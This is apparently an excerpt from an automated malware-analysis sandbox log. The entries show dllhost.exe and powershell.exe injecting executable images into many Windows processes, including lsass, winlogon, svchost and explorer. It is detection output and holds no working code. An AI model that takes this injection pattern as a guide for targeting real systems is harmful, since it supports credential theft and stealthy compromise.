Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 8C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 7E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 620000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1130000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1510000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 560000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: AD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 190000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 5D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 12E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 6A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 14B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23BF59D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1140000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1100000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 253FC3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 2A5AF330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A4670000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1780D3E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: A10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23BF59D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 253FC3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 2A5AF330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WMIADAP.exe base: 215B73E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 21426A50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 1B4A46A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1780D3E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 21D595A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 21D59C90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1EA080B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085AEE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 1AD30AF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 2085CF50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 29E3BCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 29E3BF00000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1956F090000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\cmd.exe base: 2A3ED7F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CD8E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe base: 211CF9E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 4004 base: 86A0000 value: 4D
Source: C:\Windows\System32\dllhost.exe | Memory written: PID: 4004 base: 86A0000 value: 4D
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 356
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 2432
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: target process: 6400
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread register set: 356 1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 3000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140004000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140006000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 140007000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Memory written: C:\Windows\System32\dllhost.exe base: 56B245010
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 1D15B010000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\winlogon.exe base: 2D016580000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 14E41FA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dwm.exe base: 1D15B040000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 246ED7B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23AF32B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23C9FD60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 246EDE60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 200A1980000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 200A19B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22E670C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22595FB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22E670F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 275D1FC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 24C19A40000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 275D2660000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23BBDC90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 23BBDCC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 227D8FC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 227D9540000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2DED2C70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 14ACE6E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 220AEFD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 220AF660000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 241B6940000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 241B6970000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 202A22A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 14D25AA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 21A63950000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1834ABA0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 256EBEB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2568E1B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 226A7DC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\spoolsv.exe base: 12A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22B68FC0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 207EA800000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 11CD5BB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 207C0460000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 245A2150000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 24708EB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22F60740000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26E569B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\sihost.exe base: 1D63DC20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F6984F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 86A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 257155B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A9452E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dllhost.exe base: 29227D20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22C4F660000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 281CF7C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 207EA800000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 28843650000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 207C0460000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\conhost.exe base: 1B409660000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 245A2150000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1C5325C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 24708EB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 22F60740000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 15EC91C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\sihost.exe base: 1D63DC20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1A799B20000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 1F6984F0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26481BB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 166D2D90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\ctfmon.exe base: 128DE440000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 2101D0E0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\explorer.exe base: 86A0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 192D1E50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 26DD2000000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\svchost.exe base: 257155B0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\dasHost.exe base: 16443E50000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000
Source: C:\Windows\System32\dllhost.exe | Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000
